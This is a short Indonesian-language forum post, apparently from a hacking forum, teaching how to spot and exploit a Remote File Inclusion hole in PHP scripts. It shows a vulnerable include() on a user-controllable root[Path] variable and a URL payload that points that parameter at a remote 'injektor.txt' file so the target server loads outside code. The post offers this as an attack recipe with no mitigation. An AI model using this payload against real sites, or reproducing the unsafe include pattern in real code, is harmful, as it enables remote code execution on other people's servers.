Original Post By kaMtiEz
[+] sedikit tutorial bagaimana mendeteksi sebuah RFI vulnerabilty di dalam suatu CMS /php scripts

[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita bisa melakukan require melalui injector //

[+] ok permisalan

1. misal file : function.php
2 di dalam source code funtion.php berisi scripts seperti

Code:

if(!$root['Path']){$root['Path'] = "./";}
include($root['Path']."config/config.php");

3. apabila dalam function.php gagal meng query / error di line XxX
kita dapat memasukkan injektor ..
4. dan code nya adalah :

Code:

http://127.0.0.1/path/function.php?root[Path]=

5. lalu tambahkan suatu injektor .. dan menjadi ..

Code:
http://127.0.0.1/path/function.php?root[Path]=http://127.0.0.1/injektor.txt
6. see what ? u got vuln woth RFI …
[+] sekedar tutorial dari saya .. mohon maaf apa bila ada salah / kekurangan dalam tutor ini ..
[+] ./e0f
[+] By kaMtiEz ~ original no copy paste ..